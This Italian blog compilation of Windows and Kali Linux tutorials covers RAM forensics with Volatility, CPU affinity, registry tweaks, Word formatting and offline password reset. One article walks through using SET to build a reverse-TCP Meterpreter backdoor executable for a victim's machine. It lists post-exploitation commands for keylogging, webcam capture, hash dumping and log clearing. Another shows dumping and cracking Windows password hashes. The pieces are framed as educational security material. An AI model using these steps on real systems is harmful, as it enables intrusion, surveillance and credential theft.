Windows: Estrarre e analizzare i dati contenuti nella RAM

La RAM di un PC è una memoria volatile, quando il sistema viene spento tutte le informazioni in essa contenute vengono perse. Tra le informazioni presenti in RAM è possibile trovare password, informazioni relative ai socket aperti, il contenuto della clipboard, parti di un documento non ancora salvato su disco, ecc.  Tali informazioni non sono utili solo nel campo dell'informatica forense ma possono essere utili anche a chi si occupa di sicurezza informatica per scoprire vulnerabilità di alcuni software oppure per recuperare la chiave privata da utilizzare per decriptare i dati cifrati da un ransomware (ultimamente molto diffusi).

Ci sono molti tool in grado di catturare i dati presenti in memoria tuttavia uno dei più utilizzati è il Forensic Tool Kit (FTK) messo a disposizione da AccessData. In particolare utilizzerò il tool FTK Imager di AccessData scaricabile gratuitamente dal seguente link
DOWNLOAD FTK Imager

Installazione di AccessData FTK Imager

1. Una volta scaricato FTK Imager possiamo procedere alla sua installazione cliccando sul file eseguibile. Nella prima schermata di benvenuto basta cliccare su Next per proseguire con l'installazione.
   
   

   

   FIG 1 - Installazione AccessData FTK Imager

2. Accettiamo i termini della licenza selezionando l'apposita opzione e clicchiamo sul pulsante Next per proseguire.
   
   

   

   FIG 2 - AccessData FTK Imager, Termini di licenza

3. Nella schermata successiva verifichiamo il percorso di installazione del Toolkit e clicchiamo su Next.
   
   

   

   FIG 3 - AccessData FTK Imager, Percorso di installazione

4. A questo punto siamo pronti per procedere con l'installazione del Toolkit. Cliccare sul pulsante Install per dare seguito all'installazione.
   
   

   

   FIG 4 - AccessData FTK Imager, Installazione

5. Al termine dell'installazione, lasciando la spunta all'opzione Launch AccessData FTK Imager e cliccando su Finish possiamo avviare il toolkit
   
   

   

   FIG 5 - AccessData FTK Imager, Fine installazione e avvio

Eseguire il dump della memoria con FTK Imager

1. Una volta avviato FTK Imager, per catturare l'intero contenuto della memoria RAM, cliccare sul menu File quindi selezionare Capture memory
   
   

   

   FIG 6 - AccessData FTK Imager, Capture Memory...

2. Nella finestra successiva indicare il nome da assegnare al file di dump della memoria, il percorso dove si intende salvare il file  e specificare se si intende salvare anche il file della memoria virtuale (pagefile.sys) quindi cliccare su Capture Memory.
   
   

   

   FIG 7 - AccessData FTK Imager, Memory Capture
3. Non resta che attendere la fine dell'operazione. 
   
   

   

   FIG 8 - AccessData FTK Imager, Memory Progress

Per analizzare il file di dump creato è possibile utilizzare il tool Volatility (scaricabile da QUI ) oppure utilizzare Kali Linux che lo include già al suo interno. Di seguito mostrerò proprio come utilizzare Kali Linux per analizzare il file di dump creato con FTK Imager.

Analizzare il file di dump creato con FTK Imager utilizzando Kali Linux

1. Da Kali Linux, avviare la finestra terminale
2. Posizionarsi su /usr/share/volatility utilizzando il comando 
   cd /usr/share/volatility
   
   

   

   FIG 9 - Kali Linux, Volatility

3. Lanciando il comando python vol.py -h è possibile visualizzare l'elenco delle opzioni e dei plugin che è possibile utilizzare con Volatility. I plugin ci consentono di estrarre dal file di dump diverse informazioni.
4. Per visualizzare le informazioni del file .mem è necessario lanciare il comando python vol.py imageinfo -f /<percorso_e_nome_file.mem> indicando il percorso e il nome del file .mem creato con FTK Imager. Supponiamo di aver copiato tale file, nominato memdump.mem, sul desktop di Kali Linux, in questo caso il comando da lanciare è il seguente 
   python vol.py imageinfo -f /root/Desktop/memdump.mem
   
   

   

   FIG 10 - Kali Linux, Volatility - Imageinfo

   Dall'analisi del file di dump possiamo estrarre diverse informazioni come la versione del sistema operativo, il numero di CPU, gli indirizzi fisici per ciascun processore, la data e ora relativa alla creazione del dump, ecc.
5. Un'altra informazione utile che possiamo estrapolare dal file di dump della RAM è quella relativa ai processi che erano in esecuzione sulla macchina. Il comando da eseguire da terminale è il seguente
   python vol.py pslist --profile=Win10x64 -f /root/Desktop/memdump.mem
   Dove al posto di Win10x64 va indicato il profilo (Suggested Profile) visualizzato dal comando visto nel punto 4
   

   

   FIG 11 - Kali Linux, Volatility - pslist

6. Anche il plug-in pstree permette di visualizzare i processi che erano in esecuzione e l'output viene formattato evidenziando la struttura ad albero.
   python vol.py pstree --profile=Win10x64 -f /root/Desktop/memdump.mem
   
   

   

   FIG 12 - Kali Linux, Volatility - pstree

7. Per visualizzare l'elenco dei driver che erano caricati è possibile utilizzare il plugin driverscan
   python vol.py driverscan --profile=Win10x64 -f /root/Desktop/memdump.mem
   
   

   

   FIG 13 - Kali Linux, Volatility - driverscan

8. Per conoscere le ultime console eseguite sulla workstation
   python vol.py consoles --profile=Win10x64 -f /root/Desktop/memdump.mem
9. Per visualizzare i servizi che erano in esecuzione
   python vol.py svcscan --profile=Win10x64 -f /root/Desktop/memdump.mem
   

   

   FIG 14 - Kali Linux, Volatility - svcscan

10. Per visualizzare i driver installati e relative periferiche. 
    python vol.py devicetree --profile=Win7SP1x64 -f /root/Desktop/memdump.mem
    
    

    

    FIG 15 - Kali Linux, Volatility - devicetree

11. Per visualizzare gli Hive del registro caricati in memoria 
    python vol.py hivelist --profile=Win7SP1x64 -f /root/Desktop/memdump.mem
    
    

    

    FIG 16 - Kali Linux, Volatility - hivelist

    I due indirizzi evidenziati in figura sono indirizzi virtuali del hive di SAM e SYSTEM. Questi 2 Hive contengono informazioni sufficienti ad estrarre l'hash delle password di Windows (utilizzando il plugin hasdump mostrato di seguito)
12. Con le informazioni recuperate al punto 11, possiamo eseguire il plugin hashdump per risalire all'hash delle password di Windows. 
    python vol.py hashdump --profile=Win7SP1x64 -f /root/Desktop/memdump.mem -y 0xfffff8a000024010 -s 0xfffff8a001f2f010
    
    

    

    FIG 17 - Kali Linux, Volatility - hashdump

L'hash delle password può essere utilizzato per risalire alla password in chiaro degli account di Windows. Dall'output fornito da hashdump, individuare l'account par il quale si intende risalire alla password (in FIG 18 l'account di nostro interesse è Virtual) e copiare l'hash della password (evidenziato in FIG 18).
Una volta trovato l'hash si può tentare di risalire alla password di Windows tramite l'utilizzo di appositi tool, tabelle già compilate o servizi web come https://crackstation.net/

FIG 18 - Kali Linux, Hash della password

Come si intuisce l'argomento è molto vasto e per trattarlo completamente richiederebbe la stesura di un libro. L'articolo vuole essere solo uno spunto indicando le operazioni basilari che è possibile effettuare.

Windows Quick Tip: Impostare l'affinità del processore e limitare il numero di core utilizzati da un processo

Settare l'affinità del processore permette di selezionare, per un determinato processo, quanti e quali core della CPU utilizzare. Per default Windows permette ad un processo di accedere a tutti i core disponibili, tuttavia tale impostazione può creare problemi, o comunque ridurre le prestazioni, delle applicazioni non ottimizzate per lavorare con più core. In questo caso per l'applicazione incriminata possiamo impostare l'affinità del processore in modo che venga utilizzato un solo core.

Per impostare l'affinità di un determinato processo possiamo procedere nel seguente modo:

• Avviare l'applicazione/processo;
• Avviare Task Manager (CTRL+SHIFT+ESC) e posizionarsi sulla scheda Processi  o Dettagli (a seconda della versione di Windows);
• Cliccare con il tasto destro del mouse sul processo a cui vogliamo settare l'affinità e, dal menu contestuale, selezionare la voce Imposta Affinità. A questo punto non resta che selezionare su quali core il processo deve essere eseguito.

FIG 1 - Impostazione Affinità tramite Task Manager/Gestione Attività

Agendo tramite il Task Manager (o Gestione Attività) l'impostazione è solo temporanea: terminando e riavviando il processo le impostazioni di affinità torneranno quelle di default. Quello che possiamo fare è lanciare il processo con alcune opzioni da riga di comando oppure creare un collegamento. Prima però è necessario fare una piccola premessa.
I core della CPU sono numerati a partire da 0. Supponiamo che la nostra CPU sia dotata di 4 Core fisici. Windows, con l'utilizzo della tecnologia Hyper-Threading, vedrà 8 core numerati da 0 a 7 così come mostrato in tabella. Supponiamo di voler eseguire un processo solo sul Core 1 e Core 3. A questi 2 core assegniamo il valore 1 mentre ai restanti assegniamo valore 0 (si veda la seconda riga della tabella).

Core 7	Core 6	Core 5	Core 4	Core 3	Core 2	Core 1	Core 0
0	0	0	0	1	0	1	0

Nella seconda riga della tabella abbiamo il seguente valore binario 00001010 che convertito in esadecimale (HEX) corrisponde ad A. Questo valore verrà utilizzato all'interno del comando per impostare l'affinità del processore in modo che il processo venga eseguito solo sui Core 1 e 3.

Per creare un collegamento che imposti l'affinità del processore di un determinato processo:

• Cliccare con il tasto destro del mouse su un'area vuota del desktop, quindi selezionare dal menu contestuale l'opzione Nuovo e poi cliccare su Collegamento.
  
• Nella casella di testo Immettere il percorso per il collegamento inserire il comando che si intende eseguire. In questo caso il comando sarà del tipo
  cmd.exe /c start "Nome Programma" /affinity <numero_core_in_hex> "percorso completo file"
  ad es. se vogliamo eseguire notepad.exe sul core 3 e 1 il comando sarà
  cmd.exe /c start "Blocco note" /affinity A "C:\Windows\notepad.exe"
  
  

  

  FIG 2 - Creazione collegamento per impostare l'affinità del processore

• Una volta immesso il comando cliccare sul pulsante Avanti e digitare un nome da dare al collegamento quindi cliccare su Fine.
  

  

  FIG 3 - Specificare un nome per il collegamento

Cliccando sul collegamento appena creato l'applicazione verrà eseguita solo sui core impostati. Se da Task Manager verifichiamo le impostazioni di affinità vedremo che sono impostate sul core 3 e 1 così come indicato nel collegamento.

FIG 4 - Impostazione affinità del processore

Windows Quick Tip: Disabilitare il tasto Windows della tastiera agendo tramite il registro

Ormai su tutte le tastiere è presente il tasto con il logo di Windows che consente, da solo o in combinazione ad altri tasti, di accedere a diverse funzioni messe a disposizione dal sistema operativo.

É possibile disattivare il tasto Windows agendo sul registro di sistema attenendosi alla seguente procedura:

• Avviare l'editor del registro di sistema (WIN+R e digitare regedit seguito da invio);
• Posizionarsi su
  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout
• Creare un nuovo Valore Binario e rinominarlo in Scancode Map 
• Nel campo dati del valore appena creato digitare 00000000000000000300000000005BE000005CE000000000

Affinché la modifica diventi effettiva è necessario riavviare il sistema.

Per ripristinare la funzionalità del tasto Windows basta eliminare il valore Scancode Map

FIG 1 - Disabilita tasto Windows: Scancode Map

Di seguito è possibile scaricare i file .reg per abilitare/disabilitare il tasto Windows
DOWNLOAD

Kali Linux: Creare una backdoor per Windows utilizzando SET

Social-Engineer Toolkit (SET), scritto da David Kennedy (ReL1K), è un insieme di tool progettati per eseguire attacchi basati sull'ingegneria sociale. In quest'articolo mostrerò uno dei possibili attacchi realizzabili con questo toolkit incluso in Kali Linux che prevede la creazione di un file eseguibile che, se eseguito sulla macchina della vittima, apre una backdoor.
                 
ATTENZIONE:

Danneggiare un sistema informatico (anche da remoto) rappresenta un reato penale. Le informazioni presenti in quest'articolo vanno utilizzate solo per testare/verificare sistemi di cui si è titolari. Declino ogni responsabilità civile e penale derivante da un utilizzo non legale delle informazioni presentate in questo articolo a solo scopo didattico.

• La prima operazione da effettuare è quella di avviare SET: da terminale eseguire il comando setoolkit oppure, dall'interfaccia grafica di Kali Linux (Versione 2016.1), cliccare su Applications>Social Engineering Tools>Social Engineering Toolkit.
  

  

  FIG 1 - Social Engineering Tools

• Dal menu che appare selezionare l'opzione 1) Social-Engineering Attacks
  

  

  FIG 2 - Social-Engineering Attacks

• Selezionare l'opzione 4) Create a Payload and Listener.
  

  

  FIG 3 - Create a Payload and Listener

• Selezionare 2) Windows Reverse_TCP Meterpreter.
  

  

  FIG 4 - Windows Reverse_TCP Meterpreter

• Indicare l'indirizzo IP che il payload deve contattare una volta che viene eseguito dalla vittima (indirizzo IP di chi attacca).
  

  

  FIG 5 - IP Address

• Specificare la porta del listener (in genere 443) confermando con invio. Verrà creato un eseguibile chiamato payload.exe (in /root/.usr/payload.exe) che consente di aprire una backdoor sulla workstation della vittima.
  

  

  FIG 6 - Porta su cui attendere la comunicazione del payload

  
  

  

  FIG 7 - Percorso del payload.exe da eseguire sulla macchina della vittima

• A questo punto viene richiesto se si intende avviare il listener sulla macchina di chi sta eseguendo l'attacco. Digitare yes seguito da invio per avviare la msfconsole.
  

  

  FIG 8 - Avvio del listener

• Una volta che msfconsole è stata avviata non resta che attendere che il file payload.exe venga eseguito sulla macchina della vittima e verrà aperta una sessione di Meterpreter.
  

  

  FIG 9 - Sessione Meterpreter
• Digitare il comando sessions -i 1 dove 1 rappresenta il numero della sessione che si intende selezionare (in FIG 9 è possibile vedere il numero della sessione nella dicitura session 1 opened)
  

  

  FIG 10 - Attivare la sessione

• Per fare in modo che meterpreter rimanga aperto è necessario migrare il payload su un altro processo. Per eseguire questa operazione è necessario disporre del PDI (process ID) di un altro processo. Usare il comando ps per visualizzare i processi attualmente in esecuzione sulla macchina vittima. Una volta individuato il PID su cui vogliamo migrare utilizziamo il comando
  migrate <PID del processo>
  ad es
  migrate 4878
  

Digitando help visualizziamo l'elenco dei comandi che possiamo eseguire sulla macchina della vittima

Possiamo riavviare la postazione, trasferire file, terminare processi, prendere il controllo della webcam/microfono, ecc.

Di seguito un elenco dei comandi che è possibile eseguire:

Core Commands
=============

    Command                   Description
    -------                        -----------
    ?                               Help menu
    background                Backgrounds the current session
    bgkill                         Kills a background meterpreter script
    bglist                         Lists running background scripts
    bgrun                        Executes a meterpreter script as a background thread
    channel                     Displays information or control active channels
    close                         Closes a channel
    disable_unicode_encoding  Disables encoding of unicode strings
    enable_unicode_encoding   Enables encoding of unicode strings
    exit                           Terminate the meterpreter session
    get_timeouts             Get the current session timeout values
    help                          Help menu
    info                           Displays information about a Post module
    irb                            Drop into irb scripting mode
    load                          Load one or more meterpreter extensions
    machine_id                Get the MSF ID of the machine attached to the session
    migrate                     Migrate the server to another process
    quit                           Terminate the meterpreter session
    read                          Reads data from a channel
    resource                    Run the commands stored in a file
    run                            Executes a meterpreter script or Post module
    set_timeouts              Set the current session timeout values
    sleep                         Force Meterpreter to go quiet, then re-establish session.
    transport                   Change the current transport mechanism
    use                           Deprecated alias for 'load'
    uuid                          Get the UUID for the current session
    write                         Writes data to a channel


Stdapi: File system Commands
============================

    Command       Description
    -------             -----------
    cat                 Read the contents of a file to the screen
    cd                  Change directory
    dir                  List files (alias for ls)
    download        Download a file or directory
    edit                Edit a file
    getlwd            Print local working directory
    getwd             Print working directory
    lcd                 Change local working directory
    lpwd               Print local working directory
    ls                   List files
    mkdir             Make directory
    mv                 Move source to destination
    pwd                Print working directory
    rm                  Delete the specified file
    rmdir              Remove directory
    search            Search for files
    show_mount   List all mount points/logical drives
    upload            Upload a file or directory


Stdapi: Networking Commands
===========================

    Command       Description
    -------             -----------
    arp                 Display the host ARP cache
    getproxy         Display the current proxy configuration
    ifconfig           Display interfaces
    ipconfig          Display interfaces
    netstat           Display the network connections
    portfwd          Forward a local port to a remote service
    route             View and modify the routing table


Stdapi: System Commands
=======================

    Command       Description
    -------             -----------
    clearev           Clear the event log
    drop_token     Relinquishes any active impersonation token.
    execute          Execute a command
    getenv           Get one or more environment variable values
    getpid            Get the current process identifier
    getprivs         Attempt to enable all privileges available to the current process
    getsid            Get the SID of the user that the server is running as
    getuid            Get the user that the server is running as
    kill                 Terminate a process
    ps                  List running processes
    reboot            Reboots the remote computer
    reg                Modify and interact with the remote registry
    rev2self         Calls RevertToSelf() on the remote machine
    shell              Drop into a system command shell
    shutdown       Shuts down the remote computer
    steal_token    Attempts to steal an impersonation token from the target process
    suspend         Suspends or resumes a list of processes
    sysinfo          Gets information about the remote system, such as OS


Stdapi: User interface Commands
===============================

    Command        Description
    -------              -----------
    enumdesktops   List all accessible desktops and window stations
    getdesktop        Get the current meterpreter desktop
    idletime             Returns the number of seconds the remote user has been idle
    keyscan_dump   Dump the keystroke buffer
    keyscan_start    Start capturing keystrokes
    keyscan_stop     Stop capturing keystrokes
    screenshot         Grab a screenshot of the interactive desktop
    setdesktop         Change the meterpreters current desktop
    uictl                  Control some of the user interface components


Stdapi: Webcam Commands
=======================

    Command        Description
    -------              -----------
    record_mic       Record audio from the default microphone for X seconds
    webcam_chat   Start a video chat
    webcam_list     List webcams
    webcam_snap  Take a snapshot from the specified webcam
    webcam_stream  Play a video stream from the specified webcam


Priv: Elevate Commands
======================

    Command       Description
    -------             -----------
    getsystem       Attempt to elevate your privilege to that of local system.


Priv: Password database Commands
================================

    Command       Description
    -------             -----------
    hashdump      Dumps the contents of the SAM database


Priv: Timestomp Commands
========================

    Command       Description
    -------             -----------
    timestomp     Manipulate file MACE attributes

Windows Quick Tip: Visualizzare la data e ora di compilazione di un file eseguibile

Quando si installa un'applicazione può capitare che la data di creazione del file eseguibile (.exe) venga impostata alla data attuale. I file eseguibili contengono al loro interno dei metadati. Alcuni di questi sono visibili nella finestra relativa alle proprietà del file, altri, come la data e l'ora di compilazione originale, possono essere estratti dal file tramite appositi tool. 
Conoscere la data di compilazione originale del file eseguibile può essere utile per individuare la versione più recente.
Un tool che permette di estrarre tale informazione è PEStamp scaricabile da http://trax.x10.mx/pestamp.exe. Il tool occupa pochi KB e può essere lanciato dal prompt dei comandi passandogli come parametro il percorso e nome del file eseguibile.

Ad es.
pestamp <nome_file.exe>

FIG 1 - PEStamp

Per richiamare il tool da più percorsi come se fosse un comando nativo si può inserire il percorso di PEStamp.exe all'interno della variabile di sistema PATH oppure si può copiare il file all'interno di c:\windows.

Altri tool prodotti dallo stesso autore (FS1) si possono scaricare da http://trax.x10.mx/apps.html

MS Word Quick Tip: Aggiungere un capolettera al documento

Per rendere più accattivante un documento MS Word è possibile aggiungere un capolettera procedendo nel seguente modo:

• Aprire il documento MS Word che si intende modificare;
• Selezionare il carattere che si intende trasformare in capolettera;
• Dal menu Inserisci nella barra multifunzione selezionare l'opzione Capolettera presente nella sezione Testo.
  

  

  FIG 1 - Capolettera

• Verrà mostrato un menù popup che permette di scegliere tra più opzioni:
  Nessuno - Elimina un capolettera precedentemente impostato
  Interno - Si tratta del classico capolettera inserito in uno spazio ricavato nel corpo del testo
  Esterno - Il capolettera viene inserito nel margine sinistro
  Opzioni capolettera... - consente di specificare opzioni personalizzate per il capolettera. 
  

  

  FIG 2 - Menu Capolettera

L'effetto delle varie opzioni viene visualizzato semplicemente sorvolando con il mouse la relativa opzione. Una volta individuato l'effetto voluto cliccare sull'opzione desiderata.
Opzioni capolettera consente, attraverso una finestra di  dialogo, di impostare ulteriori opzioni aggiuntive come la grandezza del carattere, il numero di righe occupate e la spaziatura rispetto al testo. 

FIG 3 - Opzioni Capolettera

Il capolettera viene inserito all'interno di un riquadro di testo separato e può essere spostato, modificato e ridimensionato anche successivamente. 


FIG 4 - Esempio di capolettera interno

Windows: Resettare/eliminare la password di Windows tramite Offline NT Password & Registry Editor

Può capitare di avere la necessità di accedere al sistema ma di aver dimenticato la password. In questi casi esistono diversi metodi che ci consentono di resettare/cancellare la password di accesso locale (non quella di dominio) e permetterci l'accesso al sistema. Uno di questi metodi consiste nell'utilizzo dell'ottimo tool Offline NT Password & Registry Editor.

ATTENZIONE:

Danneggiare o violare un sistema informatico (anche da remoto) rappresenta un reato penale. Le informazioni presenti in quest'articolo vanno utilizzate solo per testare/verificare sistemi di cui si è titolari. Declino ogni responsabilità civile e penale derivante da un utilizzo non legale delle informazioni presentate in questo articolo a solo scopo didattico.

Da http://pogostick.net/~pnh/ntpasswd/ è possibile scaricare sia l'immagine ISO che i file per creare una pendrive USB bootable. I file vengono scaricati in formato compresso .zip quindi dovranno essere scompattati prima di poterli utilizzare.


FIG 1 - Download Offline NT Password & Registry Editor

L'immagine ISO può essere masterizzata su cd/dvd tramite un programma di masterizzazione oppure è possibile creare una pendrive bootable tramite il tool Rufus.
Scaricando i file per la creazione di una pendrive, invece, dobbiamo copiare tutti i file sulla pendrive, aprire un prompt dei comandi come amministratore e digitare il seguente comando
X:\syslinux.exe -ma X:
dove al posto della X va indicata la lettera della nostra pendrive.

Adesso si dispone del supporto con cui si andrà ad eseguire il boot del sistema. Il tool ci chiederà di selezionare alcune opzioni (la maggior parte già selezionate di default) prima di permetterci di resettare la password. Di seguito mostrerò passo passo le operazioni da effettuare con relative immagini per semplificare la vita anche a chi è poco pratico.

Prima di iniziare è utile sapere che le password degli account di Windows vengono crittografate e memorizzate all'interno del file SAM (un file senza estensione) presente in C:\Windows\System32\config. Tale file non è accessibile/modificabile quando Windows è in esecuzione. Ecco perché è necessario creare un supporto con cui effettuare il boot del sistema senza caricare Windows. I più esperti, prima di procedere alla cancellazione della password, possono effettuare il backup dei file SAM e SYSTEM (quest'ultimo contiene il valore Bootkey con cui viene crittografato il file SAM). In questo modo è possibile ripristinare la vecchia password ricopiando semplicemente i file nella loro posizione originale.

Eliminare la password di un determinato account:

• Eseguire il boot dal supporto creato (CD/DVD o pendrive) e quando a video appare boot: come mostrato in figura FIG 2, premere invio per proseguire.

  

  FIG 2 - Offline NT Password & Registry Editor, Boot

• Il tool cerca di individuare la partizione dove è installato il sistema operativo e, al termine dell'analisi, ci propone le installazioni di Windows che ha individuato. Digitare il numero dell'installazione di Windows su cui si intende agire e premere invio. L'opzione di default, e più probabile, è indicata tra parentesi quadre (ad es. [1]). Premendo solo invio viene accettata l'opzione di default proposta dal tool.

  

  FIG 3 - Offline NT Password & Registry Editor, installazioni di Windows

• Nel caso in cui venisse richiesto, confermare il percorso del registro di sistema (Windows/System32/config) premendo invio.
• Confermare l'opzione [1] Password reset [sam] premendo invio per procedere al reset della password

  

  FIG 4 - Offline NT Password & Registry Editor, Password reset [sam]

• Premere nuovamente invio per confermare l'opzione 1 - Edit user data and passwords
  

  

  FIG 5 - Offline NT Password & Registry Editor, Edit user data and passwords

• Digitare il RID dell'account a cui si intende resettare la password e premere invio (ad es. in figura FIG 6 per resettare la password dell'utente Virtual digitare 03e9 seguito da invio)

  

  FIG 6 - Offline NT Password & Registry Editor, RID user account

• Digitare 1 per l'opzione Clear (blank) user password e premere invio
  

  

  FIG 7 - Offline NT Password & Registry Editor, Clear (blank) user password

• La password è stata eliminata. Digitare q seguito da invio per uscire (Quit editing user, back to user select) quindi ancora q e invio per terminare (FIG 8 e 9)

  

  FIG 8 - Offline NT Password & Registry Editor, Quit editing user, back to user select

  

  FIG 9 - Offline NT Password & Registry Editor, Quit (you will be asked if there is something to save)

• A questo punto viene chiesto di confermare la scrittura del registro. Premere Y seguito da invio e attendere che la scrittura del Security Account Manager (SAM)

  

  FIG 10 - Offline NT Password & Registry Editor, About to write file(s) back! Do it?

• Terminata la scrittura del file SAM viene chiesto se si intende eseguire nuovamente il tool. Confermare l'opzione N proposta premendo invio

  

  FIG 11 - Offline NT Password & Registry Editor, New run?

• Non resta che riavviare normalmente il sistema dopo aver rimosso il supporto (CD/DVD o pendrive). La password non ci verrà più richiesta.

  

  FIG 12 - Offline NT Password & Registry Editor, Reboot

Il metodo presentato funziona solo per il reset degli account locali del sistema. Nel caso in cui il disco sia criptato (ad es. con bitlocker) il tool non funziona. Se l'utente ha criptato qualche file o cartella tramite EFS (Encrypting File System) o Bitlocker, il contenuto di tali file/cartelle risulterà non accessibile finché non verrà ricordata la password originale.